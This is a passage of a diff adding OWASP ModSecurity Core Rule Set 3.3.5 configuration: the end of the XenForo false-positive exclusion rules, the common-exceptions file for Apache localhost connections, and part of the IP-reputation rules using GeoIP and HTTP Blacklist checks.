ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ + ver:'OWASP_CRS/3.3.5'" + +# Delete thread +# POST 
/xf/threads/thread-title.12345/delete +SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ + "id:9006150,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ + ver:'OWASP_CRS/3.3.5'" + +# Feature thread +# POST /xf/threads/thread-title.12345/feature-edit +SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ + "id:9006155,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" + +# Inline moderate thread +# POST /xf/inline-mod/ +SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ + "id:9006160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ver:'OWASP_CRS/3.3.5'" + +# Warn member +# POST /xf/members/name.12345/warn +# POST /xf/posts/12345/warn +SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ + "id:9006170,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ + ver:'OWASP_CRS/3.3.5'" + +# Editor +SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ + "id:9006200,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Editor +SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ + "id:9006210,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ + ver:'OWASP_CRS/3.3.5'" + +# Post attachment +# POST /xf/account/avatar +# POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo +SecRule REQUEST_FILENAME 
"@rx /(?:account/avatar|attachments/upload)$" \ + "id:9006220,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=200003,\ + ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ + ver:'OWASP_CRS/3.3.5'" + +# Media +# POST /xf/index.php?editor/media +SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ + "id:9006230,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetById=942130;ARGS:url,\ + ver:'OWASP_CRS/3.3.5'" + +# Emoji +# GET /xf/index.php?misc/find-emoji&q=(%0A%0A +SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ + "id:9006240,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=921151;ARGS:q,\ + ver:'OWASP_CRS/3.3.5'" + +# Login +# POST /xf/login/login +SecRule REQUEST_FILENAME "@endsWith /login/login" \ + "id:9006300,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ + ver:'OWASP_CRS/3.3.5'" + +# Register account +# POST /xf/register/register +# The password is passed in a variable-name form parameter. We don't +# want to exclude all parameters completely as this would cause an +# unacceptable bypass. So, we exclude only commonly hit rules. 
+SecRule REQUEST_FILENAME "@endsWith /register/register" \
+ "id:9006310,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942130;ARGS,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Confirm account
+# GET /xf/account-confirmation/name.12345/email?c=foo
+SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \
+ "id:9006315,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c"
+
+# Edit account
+# POST /xf/account/account-details
+SecRule REQUEST_FILENAME "@endsWith /account/account-details" \
+ "id:9006320,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Lost password
+# POST /xf/lost-password/user-name.12345/confirm?c=foo
+SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \
+ "id:9006330,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Set forum signature
+# POST /xf/account/signature
+SecRule REQUEST_FILENAME "@endsWith /account/signature" \
+ "id:9006340,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Search
+# POST /xf/search/search
+SecRule REQUEST_FILENAME "@endsWith /search/search" \
+ "id:9006400,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\
+ ctl:ruleRemoveTargetById=942200;ARGS:constraints,\
+ ctl:ruleRemoveTargetById=942260;ARGS:constraints,\
+ ctl:ruleRemoveTargetById=942340;ARGS:constraints,\
+ ctl:ruleRemoveTargetById=942370;ARGS:constraints,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Search within thread
+# GET /xf/threads/foo.12345/page12?highlight=foo
+SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \
+ "id:9006410,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Search within search result
+# GET /xf/search/12345/?q=foo
+SecRule REQUEST_FILENAME "@rx /search/\d+/$" \
+ "id:9006420,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Contact form
+# POST /xf/misc/contact
+SecRule REQUEST_FILENAME "@endsWith /misc/contact" \
+ "id:9006500,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Report post
+# POST /xf/posts/12345/report
+SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \
+ "id:9006510,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Alternate thread view route
+# /xf/index.php?threads/title-having-some-sql.12345/
+#
+# Especially threads with the HAVING sql keyword are FP prone.
+# This rule has some chains to narrow down the exclusion,
+# making it harder for an attacker to abuse the ARGS_NAMES
+# exclusion on other endpoints.
+SecRule REQUEST_FILENAME "@endsWith /index.php" \
+ "id:9006600,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_METHOD "@streq GET" \
+ "t:none,\
+ chain"
+ SecRule &ARGS "@eq 1" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\
+ ctl:ruleRemoveTargetById=942230;ARGS_NAMES"
+
+# Browser fingerprint (DBTech security extension)
+# May Contain various javascript/XSS false positives
+SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \
+ "id:9006700,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Get location info
+SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \
+ "id:9006710,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\
+ ver:'OWASP_CRS/3.3.5'"
+
+#
+# -=[ XenForo Global Exclusions ]=-
+#
+
+# _xfRedirect, _xfRequestUri can appear on various endpoints.
+# Cookies can appear on all endpoints.
+
+SecAction \
+ "id:9006800,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\
+ ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\
+ ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\
+ ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\
+ ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\
+ ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\
+ ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\
+ ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\
+ ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\
+ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\
+ ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\
+ ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\
+ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\
+ ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\
+ ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\
+ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\
+ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\
+ ver:'OWASP_CRS/3.3.5'"
+
+#
+# -=[ XenForo Administration Back-End ]=-
+#
+
+# Skip this section for performance unless requested file is admin.php
+
+SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
+ "id:9006900,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-XENFORO-ADMIN"
+
+SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
+ "id:9006901,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-XENFORO-ADMIN"
+
+# Admin edit user
+# POST /xf/admin.php?users/the-user-name.12345/edit
+SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \
+ "id:9006910,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
+ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Admin save user
+# POST 
/xf/admin.php?users/the-user-name.12345/save
+# Runs in phase 1 to be able to remove rule 200003.
+SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \
+ "id:9006920,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=200003,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\
+ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
+ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+# Admin edit forum notice
+# POST /xf/admin.php?notices/0/save
+# POST /xf/admin.php?notices/forum-name.12345/save
+SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \
+ "id:9006930,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Admin batch thread update
+# POST /xf/admin.php?threads/batch-update/action
+SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \
+ "id:9006940,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942200;ARGS:criteria,\
+ ctl:ruleRemoveTargetById=942260;ARGS:criteria,\
+ ctl:ruleRemoveTargetById=942330;ARGS:criteria,\
+ ctl:ruleRemoveTargetById=942340;ARGS:criteria,\
+ ctl:ruleRemoveTargetById=942370;ARGS:criteria,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Edit forum theme
+# POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic
+SecRule REQUEST_URI "@rx /admin\.php\?styles/" \
+ "id:9006950,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942200;ARGS:json,\
+ ctl:ruleRemoveTargetById=942260;ARGS:json,\
+ ctl:ruleRemoveTargetById=942300;ARGS:json,\
+ ctl:ruleRemoveTargetById=942330;ARGS:json,\
+ 
ctl:ruleRemoveTargetById=942340;ARGS:json,\
+ ctl:ruleRemoveTargetById=942370;ARGS:json,\
+ ctl:ruleRemoveTargetById=942440;ARGS:json,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Set forum options
+# POST /xf/admin.php?options/update
+SecRule REQUEST_URI "@rx /admin\.php\?options/update" \
+ "id:9006960,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Edit pages/templates
+# POST /xf/admin.php?pages/0/save
+# POST /xf/admin.php?pages/foo.12345/save
+# POST /xf/admin.php?templates/foo.1234/save
+SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \
+ "id:9006970,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecMarker "END-XENFORO-ADMIN"
+
+SecMarker "END-XENFORO"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
new file mode 100644
index 000000000..191f2ea3a
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -0,0 +1,55 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+
+# This file is used as an exception mechanism to remove common false positives
+# that may be encountered.
+#
+# Exception for Apache SSL pinger
+#
+SecRule REQUEST_LINE "@streq GET /" \
+ "id:905100,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-generic',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
+ "t:none,\
+ ctl:ruleEngine=Off,\
+ ctl:auditEngine=Off"
+
+#
+# Exception for Apache internal dummy connection
+#
+SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
+ "id:905110,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-generic',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \
+ "t:none,\
+ ctl:ruleEngine=Off,\
+ ctl:auditEngine=Off"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf
new file mode 100644
index 000000000..8f22689fb
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf
@@ -0,0 +1,323 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ IP Reputation Block Flag Check ]=-
+#
+# The first check we do is to see if the client IP address has already
+# been blacklisted by rules from previous requests.
+#
+# If the rule matches, it will do a skipAfter and pick up processing
+# at the end of the request phase for actual blocking.
+#
+SecRule TX:DO_REPUT_BLOCK "@eq 1" \
+ "id:910000,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Request from Known Malicious Client (Based on previous traffic violations)',\
+ logdata:'Previous Block Reason: %{ip.reput_block_reason}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain,\
+ skipAfter:BEGIN-REQUEST-BLOCKING-EVAL"
+ SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ GeoIP Checks ]=-
+#
+# This rule requires activating the SecGeoLookupDB directive
+# in the crs-setup.conf file and specifying
+# the list of blocked countries (tx.high_risk_country_codes).
+#
+# This rule does a GeoIP resolution on the client IP address.
+#
+SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \
+ "id:910100,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Client IP is from a HIGH Risk Country Location',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule TX:REAL_IP "@geoLookup" \
+ "chain"
+ SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
+
+
+#
+# -=[ IP Reputation Checks ]=-
+#
+# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert
+# Ref: http://www.modsecurity.org/projects/commercial/rules/
+#
+# This rule checks the client IP address against a list of recent IPs captured
+# from the SpiderLabs web honeypot systems (last 48 hours).
+#
+#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \
+# "id:910110,\
+# phase:2,\
+# block,\
+# t:none,\
+# msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\
+# tag:'application-multi',\
+# tag:'language-multi',\
+# tag:'platform-multi',\
+# tag:'attack-reputation-ip',\
+# tag:'paranoia-level/1',\
+# severity:'CRITICAL',\
+# setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+# setvar:'ip.reput_block_flag=1',\
+# setvar:'ip.reput_block_reason=%{rule.msg}',\
+# expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
+
+
+#
+# First check if we have already run an @rbl check for this IP by checking in IP collection.
+# If we have, then skip doing another check.
+#
+SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \
+ "id:910120,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-RBL-LOOKUP"
+
+#
+# Check Client IP against ProjectHoneypot's HTTP Blacklist
+# Ref: http://www.projecthoneypot.org/httpbl_api.php
+#
+# To use the blacklist, you must register for an HttpBL API Key
+# and choose the traffic types to block. See section
+# "Project Honey Pot HTTP Blacklist" in crs-setup.conf.
+#
+# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey
+#
+
+# Skip HttpBL checks if user has not defined one of the TX:block_* variables.
+# This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey"
+SecRule &TX:block_suspicious_ip "@eq 0" \
+ "id:910130,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain,\
+ skipAfter:END-RBL-CHECK"
+ SecRule &TX:block_harvester_ip "@eq 0" \
+ "chain"
+ SecRule &TX:block_spammer_ip "@eq 0" \
+ "chain"
+ SecRule &TX:block_search_ip "@eq 0"
+
+SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \
+ "id:910140,\
+ phase:2,\
+ pass,\
+ capture,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.httpbl_msg=%{tx.0}',\
+ chain"
+ SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \
+ "capture,\
+ t:none,\
+ setvar:'tx.httpbl_msg=%{tx.1}'"
+
+# The following regexs are generated based off re_operators.c
+SecRule TX:block_search_ip "@eq 1" \
+ "id:910150,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'HTTP Blacklist match for search engine IP',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain,\
+ skipAfter:END-RBL-CHECK"
+ SecRule TX:httpbl_msg "@rx Search Engine" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ setvar:'ip.previous_rbl_check=1',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
+ expirevar:'ip.previous_rbl_check=86400'"
+
+SecRule TX:block_spammer_ip "@eq 1" \
+ "id:910160,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'HTTP Blacklist match for spammer IP',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ 
severity:'CRITICAL',\
+ chain,\
+ skipAfter:END-RBL-CHECK"
+ SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ setvar:'ip.previous_rbl_check=1',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
+ expirevar:'ip.previous_rbl_check=86400'"
+
+SecRule TX:block_suspicious_ip "@eq 1" \
+ "id:910170,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'HTTP Blacklist match for suspicious IP',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain,\
+ skipAfter:END-RBL-CHECK"
+ SecRule TX:httpbl_msg "@rx (?i)^.*? suspicious .*?$" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ setvar:'ip.previous_rbl_check=1',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
+ expirevar:'ip.previous_rbl_check=86400'"
+
+SecRule TX:block_harvester_ip "@eq 1" \
+ "id:910180,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'HTTP Blacklist match for harvester IP',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain,\
+ skipAfter:END-RBL-CHECK"
+ SecRule TX:httpbl_msg "@rx (?i)^.*? 
harvester .*?$" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ setvar:'ip.previous_rbl_check=1',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
+ expirevar:'ip.previous_rbl_check=86400'"
+
+SecAction \
+ "id:910190,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-ip',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'ip.previous_rbl_check=1',\
+ expirevar:'ip.previous_rbl_check=86400'"
+
+SecMarker "END-RBL-LOOKUP"
+
+SecMarker "END-RBL-CHECK"
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+#
